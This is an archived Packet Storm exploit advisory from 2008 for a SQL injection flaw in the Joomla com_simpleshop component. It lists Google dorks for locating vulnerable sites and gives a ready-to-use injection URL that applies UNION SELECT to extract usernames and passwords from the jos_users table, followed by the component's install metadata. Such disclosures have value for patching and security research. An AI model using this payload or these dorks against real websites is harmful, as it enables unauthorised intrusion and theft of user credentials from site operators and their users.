joomlasimpleshop-sql.txt

2008-02-25T00:00:00
ID PACKETSTORM:63994
Type packetstorm
Reporter S@BUN
Modified 2008-02-25T00:00:00

Description

                                        
                                            `###############################################################  
#  
# joomla com_simpleshop SQL Injection(section)  
#  
###############################################################  
#  
# AUTHOR : S@BUN  
#  
# HOME : http://www.milw0rm.com/author/1334  
#  
# MAİL : hackturkiye.hackturkiye@gmail.com  
#  
################################################################  
#  
# DORK 1 : allinurl:"com_simpleshop"  
#  
# DORK 2 : allinurl: "com_simpleshop"section  
#  
################################################################  
EXPLOIT :  
  
index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section&section=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*  
  
################################################################  
# S@BUN i AM NOT HACKER S@BUN  
################################################################  
  
<mosinstall type="component" version="4.5.2">  
<name>simple shop</name>   
<author>galore.co.za</author>   
<creationDate>July 2007</creationDate>   
<copyright>(C) 2000 - 2007 galore.co.za</copyright>   
<license>http://www.gnu.org/copyleft/gpl.html GNU/GPL</license>   
<authorEmail>info@galore.co.za</authorEmail>   
<authorUrl>www.galore.co.za</authorUrl>   
<version>2.0</version>   
  
`